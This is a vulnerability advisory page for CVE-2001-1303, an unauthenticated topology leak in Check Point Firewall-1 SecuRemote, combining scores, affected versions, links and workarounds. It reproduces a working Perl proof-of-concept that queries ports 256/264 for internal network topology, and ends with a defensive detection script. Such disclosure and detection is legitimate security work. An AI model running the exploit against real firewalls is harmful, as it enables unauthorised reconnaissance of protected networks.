CVE-2001-1303
CVSS 5.0
Published: 2001-07-18 00:00:00
Revised: 2008-09-10 15:10:13

[Original] The default configuration of SecuRemote for Check Point Firewall-1 allows remote attackers to obtain sensitive configuration information for the protected network without authentication.


[CNNVD] Check Point Firewall-1 SecureRemote Network Information Leak Vulnerability (CNNVD-200107-113)

        
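        SecureRemote is a proprietary VPN component designed by Check Point Software and included in some versions of Firewall-1.
        The package has a security issue that allows remote attackers to gather information about the internal network.
        In some older versions, it even sends the internal network's topology information to the connecting party before authentication has completed, which may give an attacker the opportunity to learn more about the target network.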
        

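- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]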

- CPE (affected platforms and products)

cpe:/a:checkpoint:firewall-1:4.1:sp1    Checkpoint Firewall-1 1 4.1 SP1
cpe:/a:checkpoint:firewall-1:4.0    Checkpoint Firewall-1 4.0
cpe:/a:checkpoint:firewall-1:4.1    Checkpoint Firewall-1 4.1
cpe:/a:checkpoint:firewall-1:4.1:sp2    Checkpoint Firewall-1 1 4.1 SP2
cpe:/a:checkpoint:firewall-1:4.1:sp4    Checkpoint Firewall-1 1 4.1 SP4
cpe:/a:checkpoint:firewall-1:4.1:sp3    Checkpoint Firewall-1 1 4.1 SP3

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1303
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1303
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-113
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/6857.php
(VENDOR_ADVISORY)  XF  fw1-securemote-gain-information(6857)
http://www.securityfocus.com/bid/3058
(UNKNOWN)  BID  3058
http://www.securityfocus.com/archive/1/197566
(UNKNOWN)  BUGTRAQ  20010718 Firewall-1 Information leak
http://www.osvdb.org/588
(UNKNOWN)  OSVDB  588

- Vulnerability information

Check Point Firewall-1 SecureRemote Network Information Leak Vulnerability
Medium risk    Configuration error
2001-07-18 00:00:00 2005-05-02 00:00:00
Remote
        
        

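- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends taking the following measures to reduce the threat:
        * Using the Policy Editor, disable the "respond to unauthenticated topology requests" option.
        Vendor patch:
        Check Point Software
        --------------------
        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
        
        http://www.checkpoint.com/techsupport/downloads/downloads.html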

- Vulnerability information (21015)

Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability (EDBID:21015)
hardware remote
2001-07-17 Verified
0 Haroon Meer & Roelof Temmingh
N/A
source: http://www.securityfocus.com/bid/3058/info

SecureRemote is the proprietary VPN infrastructure designed by Check Point Software, and included with some versions of Firewall-1.

A problem with the package allows remote users to gain information about internal networks. Older versions of the package send network topology information to SecureRemote connections prior to authentication, allowing an information gathering attack. 

#!/usr/bin/perl
# A Command-line tool that can be used to download network Topology
# from Firewall-1's running SecureRemote, with the option
# "Allow unauthenticated cleartext topology downloads".
# Usage sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# haroon@sensepost.com - http://www.sensepost.com

use Socket;
if ($#ARGV<0) {die "Usage: sr.pl IP\n";}

$port=256;
$target=inet_aton($ARGV[0]);
print "Testing $ARGV[0] on port $port\n";

$SENDY="410000000259052100000004c41e43520000004e28746f706f6c6f67792d726571756573740a093a63616e616d6520282d53656e7365506f73742d646f74636f6d2d290a093a6368616c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*",$SENDY);

@results=sendraw($SENDY);

if ($#results == 0) {
 print "No results on port 256 - trying 264\n";
 $port=264;
 @results2=sendraw($SENDY); 
 if ($#results2 == 0) {die "Sorry - no results\n";}
} else {print @results;}

sub sendraw {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S);      $|=1;   print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { return ""; }
}
# Spidermark: sensepostdata fw1
		

- Vulnerability information

588
Check Point FireWall-1 SecuRemote Internal Network Information Remote Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability description

Check Point FireWall-1 contains a flaw that may disclose sensitive network topology information to a remote attacker. The issue is due to a flaw in the SecuRemote software which creates sessions between remote users and FW-1 modules. When a remote user connects to the system a network topology is transferred to the client, regardless of authentication.

- Timeline

2001-07-21 Unknown
2001-07-21 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:

1. Set the firewall gateway for VPN, with the "Respond to unauthenticated topology requests" enabled.
2. Set up a sample secuRemote client, and download the site topology.
3. Turn off "Respond to unauthenticated topology requests".
4. Securely distribute the file userc.C from the sample client to all secuRemote users.

You will need to send out an updated userc.C any time there is a change to the encryption domain or keying info.
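
A defender-side check to accompany the workaround above, as an added example that is not part of the original advisories or of the exploit listing: it scans captured TCP payloads sent to the two ports named on this page (256 and 264) for the cleartext `(topology-request` token and counts requests per source. The `Segment` record layout, the function names and the sample payloads are assumptions constructed for illustration.

```python
"""Flag unauthenticated SecuRemote topology requests in captured TCP payloads."""
from collections import Counter
from typing import Iterable, NamedTuple

# Ports and marker are taken from this page: the request goes to TCP 256,
# then 264, and carries the cleartext token "(topology-request".
TOPOLOGY_PORTS = {256, 264}
MARKER = b"(topology-request"


class Segment(NamedTuple):
    """One captured TCP payload (assumed layout, e.g. exported from a pcap)."""
    src_ip: str
    dst_port: int
    payload: bytes


def is_topology_request(seg: Segment) -> bool:
    """True when a payload sent to a topology port contains the marker.

    Limitation: a marker split across two TCP segments is not matched;
    reassemble the stream first if that matters for your capture.
    """
    return seg.dst_port in TOPOLOGY_PORTS and MARKER in seg.payload


def summarize(segments: Iterable[Segment], allowed: frozenset = frozenset()) -> Counter:
    """Count topology requests per source, skipping known client addresses."""
    hits = Counter()
    for seg in segments:
        if seg.src_ip not in allowed and is_topology_request(seg):
            hits[seg.src_ip] += 1
    return hits


# Constructed sample traffic (documentation addresses, not a real capture).
SAMPLE = [
    Segment("203.0.113.7", 256, b"\x00\x00(topology-request\n)\n\x00"),
    Segment("203.0.113.7", 264, b"\x00\x00(topology-request\n)\n\x00"),
    Segment("198.51.100.9", 264, b"(topology-request\n)\n\x00"),
    Segment("198.51.100.20", 443, b"(topology-request\n)\n\x00"),  # other port
    Segment("192.0.2.5", 256, b"\x16\x03\x01 unrelated bytes"),     # no marker
]

if __name__ == "__main__":
    known_clients = frozenset({"198.51.100.9"})
    for ip, count in summarize(SAMPLE, known_clients).items():
        print(f"{ip}: {count} unauthenticated topology request(s)")
```
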
